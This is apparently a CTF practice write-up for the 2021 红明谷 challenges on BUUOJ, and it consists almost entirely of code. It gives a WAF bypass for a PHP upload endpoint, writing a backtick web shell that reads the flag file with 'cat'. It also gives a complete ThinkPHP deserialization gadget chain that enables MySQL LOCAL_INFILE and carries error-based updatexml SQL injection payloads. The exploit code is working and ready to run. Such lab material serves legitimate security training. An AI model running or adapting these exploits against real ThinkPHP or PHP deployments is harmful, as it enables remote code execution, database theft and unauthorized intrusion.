[BUUOJ]红明谷CTF2021复现

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

 <?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>

1

?action=upload&data=<?=`cat%09/f*`?>

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    public function index(){
        echo(unserialize(base64_decode(file_get_contents('php://input'))));
        $this->display();
        
    }
    public function test(){
        echo(unserialize(base64_decode(file_get_contents('php://input'))));
    }
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64

<?php
namespace Think\Db\Driver{    
    use PDO;
    class Mysql{        
        protected $options = array( 
            PDO::MYSQL_ATTR_LOCAL_INFILE => true // 开启才能读取文件
        );
        protected $config = array( 
            "debug"    => true, 
            "database" => "test", // 可换成任一存在的库      
            "hostname" => "127.0.0.1",            
            "hostport" => "3306",            
            "charset"  => "utf8",            
            "username" => "root",            
            "password" => "root" // BUU环境密码为root
        );    
    }
}
namespace Think\Image\Driver{    
    use Think\Session\Driver\Memcache;    
    class Imagick{        
        private $img;        
        public function __construct(){            
            $this->img = new Memcache();        
        }    
    }
}
namespace Think\Session\Driver{    
    use Think\Model;    
    class Memcache{        
        protected $handle;        
        public function __construct(){            
            $this->handle = new Model();        
        }    
    }
}
namespace Think{    
    use Think\Db\Driver\Mysql;    
    class Model{        
        protected $options = array();       
        protected $pk;        
        protected $data = array();        
        protected $db = null;        
        public function __construct(){            
            $this->db = new Mysql();            
            $this->options['where'] = '';            
            $this->pk = 'id';            
            $this->data[$this->pk] = array(      
                // ~information_schema,mysql,performance_schema,sys,test~
                // "table" => "mysql.user where updatexml(1,concat(0x7e,mid((select(group_concat(schema_name))from(information_schema.schemata)),40),0x7e),1)#",
                // ~flag,users~
                // "table" => "mysql.user where updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)#",
                // ~flag~
                // "table" => "mysql.user where updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),0x7e),1)#",
                // flag{fafdd279-cacb-4684-b918-7a23f3164d55}
                "table" => "mysql.user where updatexml(1,concat(0x7e,mid((select`*`from`flag`),30),0x7e),1)#",
                "where" => "1=1"
            );        
        }    
    }
}
namespace {    
    echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}